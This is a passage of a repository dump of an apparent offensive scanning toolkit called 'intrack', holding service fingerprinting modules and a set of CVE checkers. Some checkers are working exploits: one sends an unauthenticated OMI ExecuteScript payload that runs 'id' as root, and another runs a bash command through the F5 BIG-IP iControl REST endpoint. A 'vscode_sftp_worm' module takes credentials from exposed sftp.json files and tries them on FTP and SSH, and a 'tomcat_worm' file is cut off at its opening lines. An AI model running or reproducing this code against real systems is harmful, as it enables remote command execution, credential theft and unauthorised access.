28 |                             exchange_panel_url = f"{url_base}/owa/auth/logon.aspx?replaceCurrent=1&url=http://{extracted_ip}/ecp"
29 |                             exchange_response = requests.get(exchange_panel_url, timeout=10, verify=False)
30 |                             if 'Exchange Admin Center' in exchange_response.text and exchange_response.status_code == 200:
31 |                                 print(f"[+] Microsoft Exchange Panel found: {url_base}")
32 |                                 web_services = ["/EWS/Exchange.asmx", "/owa/service.svc"]
33 |                                 for service_path in web_services:
34 |                                     service_url = f"{url_base}{service_path}"
35 |                                     service_response = requests.get(service_url, timeout=10, verify=False)
36 |                                     if 'X-Owa-Version' in service_response.headers:
37 |                                         print(f"[+] Microsoft Exchange Web Service found: {service_url}")
38 |                 except requests.RequestException:
39 |                     continue
40 | 


--------------------------------------------------------------------------------
/intrack/lib/instances/nginx.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_paths(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     protocols = ["http", "https"]
 8 |     paths = ["/nginx.conf", "/etc/nginx/nginx.conf", "/etc/nginx/conf.d/default.conf"]
 9 |     matchers = ["nginx", "nginx/"]
10 |     if ports is None:
11 |         ports = [80]
12 |     else:
13 |         ports = [f":{port}" for port in ports]
14 |     s = requests.Session()
15 |     for protocol in protocols:
16 |         for port in ports:
17 |             for path in paths:
18 |                 url = f"{protocol}://{ip}{port}{path}"
19 |                 try:
20 |                     r = s.get(url, timeout=timeout, headers=headers)
21 |                     if r.status_code == 200:
22 |                         if any(matcher in r.text for matcher in matchers):
23 |                             print_colour(f"Nginx detected: {url}")
24 |                             return True
25 |                 except requests.RequestException:
26 |                     continue
27 |     return False
28 | 
29 | 
30 | def check_server_header(ip, ports=None, timeout=5):
31 |     headers = {"User-Agent": user_agents()}
32 |     protocols = ["http", "https"]
33 |     matchers = ["nginx", "Nginx"]
34 |     if ports is None:
35 |         ports = [80]
36 |     else:
37 |         ports = [f":{port}" for port in ports]
38 |     s = requests.Session()
39 |     for protocol in protocols:
40 |         for port in ports:
41 |             url = f"{protocol}://{ip}{port}"
42 |             try:
43 |                 r = s.get(url, timeout=timeout, headers=headers)
44 |                 for k, v in r.headers.items():
45 |                     if k.lower() == "server":
46 |                         if any(matcher in v for matcher in matchers):
47 |                             print_colour(f"Nginx detected: {url}")
48 |                             return True
49 |             except requests.RequestException:
50 |                 continue
51 |     return False
52 | 
53 | 
54 | def check_nginx(ip, ports=None, timeout=5):
55 |     if check_paths(ip, ports, timeout):
56 |         return True
57 |     if check_server_header(ip, ports, timeout):
58 |         return True
59 |     return False
60 | 


--------------------------------------------------------------------------------
/intrack/lib/network/rtsp_mangler.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import requests
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | rtsp_probe_packet = bytes.fromhex(
 6 |     "4f5054494f4e53207369703a6e6d205349502f322e300d0a5669613a205349502f322e302f544350206e6d3b6272616e63683d666f6f0d0a"
 7 |     "46726f6d3a203c7369703a6e6d406e6d3e3b7461673d726f6f740d0a546f3a203c7369703a6e6d32406e6d323e0d0a43616c6c2d49443a20"
 8 |     "35303030300d0a435365713a203432204f5054494f4e530d0a4d61782d466f7277617264733a2037300d0a436f6e74656e742d4c656e6774"
 9 |     "683a20300d0a436f6e746163743a203c7369703a6e6d406e6d3e0d0a4163636570743a206170706c69636174696f6e2f7364700d0a0d0a"
10 | )
11 | 
12 | def rtsp_checks(ip, ports):
13 |     if ports is None:
14 |         ports = [554]
15 |     
16 |     for port in ports:
17 |         try:
18 |             with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
19 |                 sock.settimeout(5)
20 |                 sock.connect((ip, port))
21 |                 sock.sendall(rtsp_probe_packet)
22 |                 response = sock.recv(1024).decode(errors="ignore")
23 |                 if "RTSP" in response:
24 |                     print_colour(f"[+] RTSP confirmed on {ip} (port 554): {response.splitlines()[0]}")
25 |                     for port in [80, 443]:
26 |                         try:
27 |                             with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as web_sock:
28 |                                 web_sock.settimeout(5)
29 |                                 web_sock.connect((ip, port))
30 |                                 protocol = "HTTPS" if port == 443 else "HTTP"
31 |                                 url = f"{protocol.lower()}://{ip}"
32 |                                 req = requests.get(url)
33 |                                 server = req.headers.get('Server', '')
34 |                                 resp_code = req.status_code
35 |                                 if server:
36 |                                     print_colour(f"[+] {protocol} (port {port}) found open on {ip} [{server}] [{resp_code}]")
37 |                                 else:
38 |                                     print_colour(f"[+] {protocol} (port {port}) found open on {ip} [{resp_code}]")
39 |                         except socket.error:
40 |                             pass
41 |         except socket.error:
42 |             pass


--------------------------------------------------------------------------------
/intrack/lib/vulns/__init__.py:
--------------------------------------------------------------------------------
 1 | from intrack.lib.vulns.netgear.CVE_2016_6277 import check_CVE_2016_6277
 2 | from intrack.lib.vulns.ncast.CVE_2024_0305 import check_CVE_2024_0305
 3 | from intrack.lib.vulns.fortinet.CVE_2018_13379 import check_CVE_2018_13379
 4 | from intrack.lib.vulns.hikvision.CVE_2017_7921 import check_CVE_2017_7921
 5 | from intrack.lib.vulns.zabbix.CVE_2019_17382 import check_CVE_2019_17382
 6 | from intrack.lib.vulns.cisco.CVE_2019_1653 import check_CVE_2019_1653
 7 | from intrack.lib.vulns.cisco.CVE_2020_3452 import check_CVE_2020_3452
 8 | from intrack.lib.vulns.cisco.CVE_2021_1445 import check_CVE_2021_1445
 9 | from intrack.lib.vulns.cisco.CVE_2020_3259 import check_CVE_2020_3259
10 | from intrack.lib.vulns.cisco.CVE_2019_2000 import check_CVE_2019_2000
11 | from intrack.lib.vulns.cisco.CVE_2022_20842 import check_CVE_2022_20842
12 | from intrack.lib.vulns.thinkphp.CVE_2022_47945 import check_CVE_2022_47945
13 | from intrack.lib.vulns.hikvision.CVE_2021_36260 import check_CVE_2021_36260
14 | from intrack.lib.vulns.wordpress.CVE_2017_5487 import check_CVE_2017_5487
15 | from intrack.lib.vulns.fortinet.CVE_2022_40684 import check_CVE_2022_40684
16 | from intrack.lib.vulns.joomla.CVE_2023_23752 import check_CVE_2023_23752
17 | from intrack.lib.vulns.dahua.CVE_2017_7925 import check_CVE_2017_7925
18 | from intrack.lib.vulns.microsoft.CVE_2017_7269 import check_CVE_2017_7269
19 | from intrack.lib.vulns.microsoft.CVE_2015_1635 import check_CVE_2015_1635
20 | from intrack.lib.vulns.microsoft.CVE_2021_38647 import check_CVE_2021_38647
21 | from intrack.lib.vulns.microsoft.CVE_2021_34473 import check_CVE_2021_34473
22 | from intrack.lib.vulns.f5bigip.CVE_2022_1388 import check_CVE_2022_1388
23 | from intrack.lib.vulns.f5bigip.CVE_2021_22986 import check_CVE_2021_22986
24 | 
25 | __all__ = [
26 |     "check_CVE_2016_6277", "check_CVE_2024_0305", "check_CVE_2018_13379", "check_CVE_2017_7921",
27 |     "check_CVE_2019_17382", "check_CVE_2019_1653", "check_CVE_2020_3452", "check_CVE_2021_1445",
28 |     "check_CVE_2020_3259", "check_CVE_2019_2000", "check_CVE_2022_20842", "check_CVE_2022_47945",
29 |     "check_CVE_2021_36260", "check_CVE_2017_5487", "check_CVE_2022_40684", "check_CVE_2023_23752",
30 |     "check_CVE_2017_7925", "check_CVE_2017_7269", "check_CVE_2015_1635", "check_CVE_2021_38647",
31 |     "check_CVE_2021_34473", "check_CVE_2022_1388", "check_CVE_2021_22986"
32 | ]
33 | 


--------------------------------------------------------------------------------
/intrack/lib/instances/bigip_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def bigip(ip, ports=None, timeout=5):
 6 | 	headers = {"User-Agent": user_agents()}
 7 | 	protocols = ["http", "https"]
 8 | 	if ports is None:
 9 | 		ports = [80, 443, 8443]  # Common F5 ports
10 | 	else:
11 | 		# Ensure ports are integers
12 | 		ports = [int(port) if isinstance(port, str) else port for port in ports]
13 | 
14 | 	for port in ports:
15 | 		for protocol in protocols:
16 | 			# Proper URL construction with port
17 | 			url = f"{protocol}://{ip}:{port}"
18 | 			try:
19 | 				response = requests.get(url, timeout=timeout, verify=False, headers=headers, allow_redirects=True)
20 | 				
21 | 				# Check server header
22 | 				server = response.headers.get('Server', '')
23 | 				if "BigIP" in server or "BIG-IP" in server:
24 | 					print_colour(f"[+] {url} - F5 BigIP detected (Server header)")
25 | 					return True
26 | 				
27 | 				# Check for F5 specific cookies
28 | 				cookies = response.cookies
29 | 				for cookie in cookies:
30 | 					if any(x in cookie.name.lower() for x in ['bigip', 'big-ip', 'f5']):
31 | 						print_colour(f"[+] {url} - F5 BigIP detected (Cookie: {cookie.name})")
32 | 						return True
33 | 				
34 | 				# Check for login page signatures
35 | 				if "BIG-IP" in response.text or "/tmui/login.jsp" in response.text:
36 | 					print_colour(f"[+] {url} - F5 BigIP detected (Login page)")
37 | 					return True
38 | 				
39 | 				# Check for other known BigIP paths
40 | 				check_paths = [
41 | 					"/tmui/login.jsp",
42 | 					"/tmui/",
43 | 					"/mgmt/tm/sys",
44 | 					"/mgmt/shared/authn/login"
45 | 				]
46 | 				
47 | 				for path in check_paths:
48 | 					try:
49 | 						# Proper path joining to prevent double slashes
50 | 						path_url = f"{url}{'' if url.endswith('/') else '/'}{path.lstrip('/')}"
51 | 						path_response = requests.get(path_url, timeout=timeout, verify=False, headers=headers)
52 | 						if path_response.status_code == 200:
53 | 							# Found one of the BigIP-specific paths
54 | 							if "BIG-IP" in path_response.text or "F5 Networks" in path_response.text:
55 | 								print_colour(f"[+] {path_url} - F5 BigIP detected (Path signature)")
56 | 								return True
57 | 					except requests.RequestException as e:
58 | 						# More specific exception logging for debugging
59 | 						continue
60 | 					
61 | 			except requests.RequestException as e:
62 | 				# More specific error handling
63 | 				continue
64 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/exposures/security_headers.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def header_definitions(header: str):
 6 |     if header == "Strict-Transport-Security":
 7 |         return "Prevents browsers from connecting to a site over HTTP. Forces the browser to connect to the site over HTTPS."
 8 |     elif header == "X-Frame-Options":
 9 |         return "Prevents clickjacking attacks by restricting the ability of a page to be embedded into other sites."
10 |     elif header == "X-XSS-Protection":
11 |         return "Prevents XSS attacks by blocking scripts that are not in the Content-Security-Policy."
12 |     elif header == "X-Content-Type-Options":
13 |         return "Prevents MIME type sniffing attacks."
14 |     elif header == "Referrer-Policy":
15 |         return "Controls the value of the Referrer header."
16 |     elif header == "Content-Security-Policy":
17 |         return "Controls the sources of content that can be loaded in the browser."
18 |     elif header == "Permissions-Policy":
19 |         return "Controls the features of the browser that can be used."
20 |     elif header == "Feature-Policy":
21 |         return "Controls the features of the browser that can be used."
22 |     elif header == "Expect-CT":
23 |         return "Enables the Expect-CT header to be sent to the browser."
24 | 
25 | 
26 | def check_security_headers(ip, ports=None, timeout=5):
27 |     headers = {
28 |         'User-Agent': user_agents()
29 |     }
30 |     protocols = ["http", "https"]
31 |     if ports is None:
32 |         ports = [80]
33 |     else:
34 |         ports = [f":{port}" for port in ports]
35 |     
36 |     security_headers = [
37 |         "Strict-Transport-Security",
38 |         "X-Frame-Options",
39 |         "X-XSS-Protection",
40 |         "X-Content-Type-Options",
41 |         "Referrer-Policy",
42 |         "Content-Security-Policy",
43 |         "Permissions-Policy",
44 |         "Feature-Policy",
45 |         "Expect-CT",
46 |     ]
47 | 
48 |     for port in ports:
49 |         for protocol in protocols:
50 |             for header in security_headers:
51 |                 url = f"{protocol}://{ip}{port}"
52 |                 try:
53 |                     response = requests.get(url, headers=headers, verify=False, timeout=timeout)
54 |                     if header not in response.headers:
55 |                         print_colour(f"[+] {url}")
56 |                         print_colour(f"[-] Security header missing: {header}")
57 |                         print_colour(f"[+] Definition: {header_definitions(header)}")
58 |                         print("\n")
59 |                         return True
60 |                 except requests.RequestException:
61 |                     continue
62 |     return False
63 | 


--------------------------------------------------------------------------------
/intrack/lib/instances/wordpress_scanner.py:
--------------------------------------------------------------------------------
 1 | #import requests
 2 | #from intrack.lib.headers.headers_handler import user_agents
 3 | #from intrack.lib.color_handler import print_colour
 4 | 
 5 | #matchers = ["WordPress</title>", "/wp-login.php?action=lostpassword"]
 6 | 
 7 | #def check_wordpress(ip, ports=None, timeout=5):
 8 |  #   protocols = ["http", "https"]
 9 | 
10 |  #   if ports is None:
11 |  #       ports = [80]
12 |  #   else:
13 |   #      ports = [f":{port}" for port in ports]
14 | 
15 |  #   for protocol in protocols:
16 |  #       for port in ports:
17 |  #           url = f"{protocol}://{ip}{port}/wp-login.php"
18 |  #           headers = {
19 |  #               'User-Agent': user_agents()
20 |  #           }
21 |  #           try:
22 |  #               response = requests.get(url, headers=headers, timeout=timeout, verify=False)
23 |  #               if any(matcher in response.text for matcher in matchers):
24 |  #                   print_colour(f"[+] Found WordPress site: {url}")
25 |  #                   return True
26 |  #           except requests.RequestException:
27 |  #               continue
28 | #    return False
29 | 
30 | import socket
31 | import ssl
32 | from intrack.lib.headers.headers_handler import user_agents
33 | from intrack.lib.color_handler import print_colour
34 | 
35 | matchers = ["WordPress</title>", "/wp-login.php?action=lostpassword"]
36 | 
37 | def send_request(ip, port, use_ssl, timeout):
38 |     """
39 |     Sends an HTTP GET request using raw sockets and returns the response.
40 |     """
41 |     try:
42 |         sock = socket.create_connection((ip, port), timeout=timeout)
43 | 
44 |         if use_ssl:
45 |             context = ssl.create_default_context()
46 |             sock = context.wrap_socket(sock, server_hostname=ip)
47 | 
48 |         request = f"GET /wp-login.php HTTP/1.1\r\n"
49 |         request += f"Host: {ip}\r\n"
50 |         request += f"User-Agent: {user_agents()}\r\n"
51 |         request += "Connection: close\r\n\r\n"
52 | 
53 |         sock.sendall(request.encode())
54 | 
55 |         response = b""
56 |         while True:
57 |             chunk = sock.recv(4096)
58 |             if not chunk:
59 |                 break
60 |             response += chunk
61 | 
62 |         sock.close()
63 |         return response.decode(errors="ignore")  # Decode with error handling for non-UTF-8 data
64 | 
65 |     except (socket.timeout, socket.error, ssl.SSLError) as e:
66 |         return None
67 | 
68 | def check_wordpress(ip, ports=None, timeout=5):
69 |     protocols = [("http", 80, False), ("https", 443, True)]
70 | 
71 |     if ports:
72 |         ports = [(None, port, False) for port in ports]  # Custom ports, assume HTTP
73 | 
74 |     for protocol, port, use_ssl in (protocols + (ports or [])):
75 |         response = send_request(ip, port, use_ssl, timeout)
76 | 
77 |         if response and any(matcher in response for matcher in matchers):
78 |             print_colour(f"[+] Found WordPress site: {protocol}://{ip}:{port}")
79 |             return True
80 | 
81 |     return False
82 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/microsoft/CVE_2021_38647.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2021_38647(ip, ports=None, timeout=5):
 6 |     protocols = ["http", "https"]
 7 |     headers = {
 8 |         "User-Agent": user_agents(),
 9 |         "Content-Type": "application/soap+xml;charset=UTF-8"
10 |     }
11 | 
12 |     data = f"""<s:Envelope
13 |           xmlns:s="http://www.w3.org/2003/05/soap-envelope"
14 |           xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
15 |           xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
16 |           xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
17 |           xmlns:xsi="http://www.w3.org/2001/XMLSchema"
18 |           xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
19 |           xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
20 |           <s:Header>
21 |             <a:To>HTTP://{ip}/wsman/</a:To>
22 |             <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
23 |             <a:ReplyTo>
24 |               <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
25 |             </a:ReplyTo>
26 |             <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
27 |             <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
28 |             <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
29 |             <w:OperationTimeout>PT1M30S</w:OperationTimeout>
30 |             <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
31 |             <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
32 |             <w:OptionSet s:mustUnderstand="true"/>
33 |             <w:SelectorSet>
34 |               <w:Selector Name="__cimnamespace">root/scx</w:Selector>
35 |             </w:SelectorSet>
36 |           </s:Header>
37 |           <s:Body>
38 |             <p:ExecuteScript_INPUT
39 |               xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
40 |               <p:Script>aWQ=</p:Script>
41 |               <p:Arguments/>
42 |               <p:timeout>0</p:timeout>
43 |               <p:b64encoded>true</p:b64encoded>
44 |             </p:ExecuteScript_INPUT>
45 |           </s:Body>
46 |         </s:Envelope>"""
47 | 
48 |     if ports is None:
49 |         ports = [80]
50 |     else:
51 |         ports = [f":{port}" for port in ports]
52 | 
53 |     for port in ports:
54 |         for protocol in protocols:
55 |             url = f"{protocol}://{ip}{port}/wsman"
56 |             try:
57 |                 response = requests.post(url, headers=headers, data=data, verify=False, timeout=timeout)
58 |                 if "<p:StdOut>" in response.text and "uid=0(root) gid=0(root) groups=0" in response.text:
59 |                     print_colour(f"The target is vulnerable to CVE-2021-38647: {url}")
60 |                     return True
61 |             except requests.RequestException:
62 |                 continue
63 |     return False


--------------------------------------------------------------------------------
/intrack/lib/instances/microsoft_iis.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_microsoft_iis(ip, ports=None, timeout=5):
 6 |     protocols = ["http", "https"]
 7 |     if ports is None:
 8 |         ports = [80]
 9 |     else:
10 |         ports = [f":{port}" for port in ports]
11 | 
12 |     for protocol in protocols:
13 |         for port in ports:
14 |             try:
15 |                 url = f"{protocol}://{ip}{port}"
16 |                 headers = {
17 |                     'User-Agent': user_agents()
18 |                 }
19 |                 response = requests.get(url, headers=headers, timeout=timeout, allow_redirects=True, verify=False)
20 |                 server = response.headers.get('Server', '')
21 |                 if "IIS" in server:
22 |                     print_colour(f"[+] {url} [{server}]")
23 |                     return True
24 |             except requests.RequestException:
25 |                 continue
26 |     return False
27 | 
28 | #import socket
29 | #import ssl
30 | #from intrack.lib.headers.headers_handler import user_agents
31 | #from intrack.lib.color_handler import print_colour
32 | 
33 | #def send_request(ip, port, use_ssl, timeout):
34 |     """
35 |     Sends an HTTP GET request using raw sockets and returns the response headers.
36 |     """
37 | #    try:
38 | #        sock = socket.create_connection((ip, port), timeout=timeout)
39 |         
40 | #        if use_ssl:
41 | #            context = ssl.create_default_context()
42 | #            sock = context.wrap_socket(sock, server_hostname=ip)
43 | 
44 | #        request = f"GET / HTTP/1.1\r\n"
45 | #        request += f"Host: {ip}\r\n"
46 | #        request += f"User-Agent: {user_agents()}\r\n"
47 | #        request += "Connection: close\r\n\r\n"
48 |         
49 | #        sock.sendall(request.encode())
50 | 
51 | #        response = b""
52 | #        while True:
53 | #            chunk = sock.recv(4096)
54 | #            if not chunk:
55 | #                break
56 | #            response += chunk
57 | 
58 | #        sock.close()
59 | 
60 |         # Extract headers only (response before the first empty line)
61 | #        headers = response.split(b"\r\n\r\n")[0].decode(errors="ignore")
62 | #        return headers
63 | 
64 | #    except (socket.timeout, socket.error, ssl.SSLError):
65 | #        return None
66 | 
67 | #def check_microsoft_iis(ip, ports=None, timeout=5):
68 |  #   protocols = [("http", 80, False), ("https", 443, True)]
69 | 
70 |  #   if ports:
71 |  #       ports = [(None, port, False) for port in ports]  # Custom ports, assume HTTP
72 | 
73 | #    for protocol, port, use_ssl in (protocols + (ports or [])):
74 | #        headers = send_request(ip, port, use_ssl, timeout)
75 | 
76 | #        if headers:
77 | #            for line in headers.split("\r\n"):
78 | #                if line.lower().startswith("server:"):
79 | #                    server_banner = line.split(":", 1)[1].strip()
80 | #                    if "IIS" in server_banner:
81 | #                        print_colour(f"[+] {protocol}://{ip}:{port} [{server_banner}]")
82 | #                        return True
83 | 
84 | #    return False


--------------------------------------------------------------------------------
/intrack/lib/worms/vscode_sftp_worm.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | import requests
 3 | import re
 4 | import paramiko
 5 | from ftplib import FTP
 6 | 
 7 | paths = [
 8 |     "/sftp.json",
 9 |     "/.config/sftp.json",
10 |     "/.vscode/sftp.json"
11 | ]
12 | 
13 | matchers = ['"name":', '"host":', '"protocol":']
14 | 
15 | def fetch_sftp_config(url):
16 |     try:
17 |         response = requests.get(url, timeout=5, verify=False)
18 |         response.raise_for_status()
19 |         return response.text
20 |     except requests.RequestException:
21 |         return None
22 | 
23 | def extract_credentials_from_json(raw_data):
24 |     json_objects = re.findall(r'{[^}]+}', raw_data)
25 |     credentials = []
26 | 
27 |     for json_str in json_objects:
28 |         try:
29 |             data = json.loads(json_str)
30 |             username = data.get("username")
31 |             password = data.get("password")
32 |             if username and password:
33 |                 credentials.append((username, password))
34 |         except json.JSONDecodeError:
35 |             continue
36 | 
37 |     return credentials
38 | 
39 | def attempt_ftp_login(ip, username, password):
40 |     try:
41 |         ftp = FTP()
42 |         ftp.connect(ip, 21, timeout=10)
43 |         response = ftp.login(user=username, passwd=password)
44 |         if response.startswith("230"):
45 |             print(f"[+] Successful FTP login with: {username}:{password}")
46 |         else:
47 |             print(f"[-] FTP login failed for: {username}:{password}")
48 |         ftp.quit()
49 |     except Exception:
50 |         print(f"[-] FTP connection error for {username}:{password}:")
51 | 
52 | def attempt_ssh_login(ip, username, password):
53 |     try:
54 |         ssh = paramiko.SSHClient()
55 |         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
56 |         ssh.connect(ip, port=22, username=username, password=password, timeout=10)
57 |         print(f"[+] Successful SSH login with: {username}:{password}")
58 |         ssh.close()
59 |     except paramiko.AuthenticationException:
60 |         print(f"[-] SSH Authentication failed for {username}:{password}")
61 |     except paramiko.SSHException:
62 |         print(f"[-] SSH connection error for {username}:{password}")
63 |     except Exception:
64 |         print(f"[-] General error for SSH connection {username}:{password}")
65 | 
66 | def crawl_vscode_sftp(ip, port=None):
67 |     protocols = ["http", "https"]
68 |     ports = [f":{port}" if port else ""]
69 |     sftp_found = False
70 | 
71 |     for protocol in protocols:
72 |         for port_suffix in ports:
73 |             for path in paths:
74 |                 url = f"{protocol}://{ip}{port_suffix}{path}"
75 |                 raw_data = fetch_sftp_config(url)
76 |                 if raw_data and any(matcher in raw_data for matcher in matchers):
77 |                     print(f"[+] VsCodeSFTP file found: {url}")
78 |                     credentials = extract_credentials_from_json(raw_data)
79 |                     sftp_found = True
80 | 
81 |                     for username, password in credentials:
82 |                         attempt_ftp_login(ip, username, password)
83 |                         attempt_ssh_login(ip, username, password)
84 | 
85 |     return sftp_found


--------------------------------------------------------------------------------
/intrack/lib/vulns/f5bigip/CVE_2021_22986.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import json
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | def check_CVE_2021_22986(ip, ports=None, timeout=5):
 7 |     """
 8 |     Check for CVE-2021-22986 - Unauthenticated RCE in F5 BIG-IP
 9 |     This vulnerability in the iControl REST interface allows unauthenticated attackers 
10 |     to execute arbitrary system commands
11 |     """
12 |     if ports is None:
13 |         ports = [443, 8443]  # Default BIG-IP management ports
14 |     else:
15 |         ports = [int(port) for port in ports]
16 |     
17 |     headers = {
18 |         "User-Agent": user_agents(),
19 |         "Content-Type": "application/json",
20 |         "X-F5-Auth-Token": "",
21 |         "Authorization": ""
22 |     }
23 |     
24 |     payload = {
25 |         "command": "run",
26 |         "utilCmdArgs": "-c 'hostname'"
27 |     }
28 |     
29 |     vulnerable = False
30 |     
31 |     for port in ports:
32 |         endpoints = [
33 |             f"https://{ip}:{port}/mgmt/tm/util/bash",
34 |             f"https://{ip}:{port}/mgmt/shared/authn/login"
35 |         ]
36 |         
37 |         for url in endpoints:
38 |             try:
39 |                 response = requests.post(
40 |                     url, 
41 |                     headers=headers, 
42 |                     json=payload, 
43 |                     verify=False, 
44 |                     timeout=timeout
45 |                 )
46 |                 
47 |                 if response.status_code == 200 and "commandResult" in response.text:
48 |                     vulnerable = True
49 |                     hostname = json.loads(response.text).get("commandResult", "").strip()
50 |                     print_colour(f"[+] The target is vulnerable to CVE-2021-22986 (F5 BIG-IP Unauthenticated RCE): {url}")
51 |                     print_colour(f"[+] Hostname: {hostname}")
52 |                     return True
53 |                     
54 |                 # Check login endpoint response for vulnerability indicators
55 |                 if "token" in response.text and "userReference" in response.text:
56 |                     vulnerable = True
57 |                     print_colour(f"[+] The target is vulnerable to CVE-2021-22986 (F5 BIG-IP Unauthenticated RCE): {url}")
58 |                     print_colour(f"[+] Authentication bypass successful")
59 |                     return True
60 |                     
61 |             except requests.RequestException:
62 |                 continue
63 |     
64 |     for port in ports:
65 |         url = f"https://{ip}:{port}/mgmt/shared/authn/login"
66 |         try:
67 |             response = requests.post(
68 |                 url,
69 |                 headers={"Content-Type": "application/json"},
70 |                 data="{}",
71 |                 verify=False,
72 |                 timeout=timeout
73 |             )
74 |             
75 |             if response.status_code != 401 and "Missing required parameter" in response.text:
76 |                 vulnerable = True
77 |                 print_colour(f"[+] The target is likely vulnerable to CVE-2021-22986 (F5 BIG-IP Unauthenticated RCE): {url}")
78 |                 return True
79 |                 
80 |         except requests.RequestException:
81 |             continue
82 |     
83 |     return vulnerable 


--------------------------------------------------------------------------------
/intrack/lib/exposures/sensitive_endpoint_scanner.py:
--------------------------------------------------------------------------------
  1 | import requests
  2 | from intrack.lib.headers.headers_handler import user_agents
  3 | from intrack.lib.color_handler import print_colour
  4 | 
  5 | 
  6 | def check_sensitive_endpoints(ip: str, ports=None, timeout=5):
  7 |     headers = {"User-Agent": user_agents()}
  8 |     protocols = ["http", "https"]
  9 |     if ports is None:
 10 |         ports = [80]
 11 |     else:
 12 |         ports = [f":{port}" for port in ports]
 13 |     
 14 |     status_info_dashboard_paths = [
 15 |         "/server-status",
 16 |         "/status",
 17 |         "/stats",
 18 |         "/server-info",
 19 |         "/nginx_status",
 20 |         "/_status",
 21 |         "/server_status",
 22 |         "/apache-status",
 23 |         "/apache_status",
 24 |         "/server/stats",
 25 |         "/monitoring",
 26 |         "/server/status"
 27 |     ]
 28 |     
 29 |     phpinfo_paths = [
 30 |         "/phpinfo.php",
 31 |         "/info.php",
 32 |         "/php_info.php",
 33 |         "/test.php",
 34 |         "/i.php",
 35 |         "/infophp.php",
 36 |         "/phpinfo",
 37 |         "/phpinfo.php",
 38 |         "/info.php",
 39 |         "/php_info.php",
 40 |         "/test.php",
 41 |         "/i.php",
 42 |         "/infophp.php",
 43 |     ]
 44 | 
 45 |     dashboard_paths = [
 46 |         "/dashboard",
 47 |         "/admin",
 48 |         "/admin/dashboard",
 49 |         "/admin-panel",
 50 |         "/management",
 51 |         "/control",
 52 |         "/panel",
 53 |         "/console",
 54 |         "/statistics",
 55 |         "/monitor",
 56 |         "/grafana",
 57 |         "/kibana",
 58 |         "/prometheus",
 59 |         "/metrics",
 60 |         "/nagios",
 61 |         "/zabbix",
 62 |         "/admin/monitoring",
 63 |         "/status-dashboard",
 64 |     ]
 65 | 
 66 |     monitoring_paths = [
 67 |         "/munin",
 68 |         "/cacti",
 69 |         "/netdata",
 70 |         "/monitor/",
 71 |         "/prtg/",
 72 |         "/check_mk/",
 73 |         "/centreon",
 74 |         "/icinga/",
 75 |         "/observium/",
 76 |         "/ganglia/"
 77 |     ]
 78 |     
 79 |     
 80 |     for port in ports:
 81 |         for protocol in protocols:
 82 |             base_url = f"{protocol}://{ip}{port}"
 83 |             for path_status in status_info_dashboard_paths:
 84 |                 url = f"{base_url}{path_status}"
 85 |                 try:
 86 |                     response = requests.get(url, headers=headers, verify=False, timeout=timeout)
 87 |                     if response.status_code == 200:
 88 |                         print(f"[+] {url}")
 89 |                         return True
 90 |                 except requests.RequestException:
 91 |                     continue
 92 |             for path_dashboard in dashboard_paths:
 93 |                 url = f"{base_url}{path_dashboard}"
 94 |                 try:
 95 |                     response = requests.get(url, headers=headers, verify=False, timeout=timeout)
 96 |                     if response.status_code == 200:
 97 |                         print(f"[+] {url}")
 98 |                         return True
 99 |                 except requests.RequestException:
100 |                     continue
101 |             for path_monitoring in monitoring_paths:
102 |                 url = f"{base_url}{path_monitoring}"
103 |                 try:
104 |                     response = requests.get(url, headers=headers, verify=False, timeout=timeout)
105 |                     if response.status_code == 200:
106 |                         print(f"[+] {url}")
107 |                         return True
108 |                 except requests.RequestException:
109 |                     continue
110 |             for path_phpinfo in phpinfo_paths:
111 |                 url = f"{base_url}{path_phpinfo}"
112 |                 try:
113 |                     response = requests.get(url, headers=headers, verify=False, timeout=timeout)
114 |                     if response.status_code == 200:
115 |                         print(f"[+] {url}")
116 |                         return True
117 |                 except requests.RequestException:
118 |                     continue
119 |             
120 |     return False


--------------------------------------------------------------------------------
/intrack/lib/worms/tomcat_worm.py:
--------------------------------------------------------------------------------
  1 | import random
  2 | import string
  3 | import requests
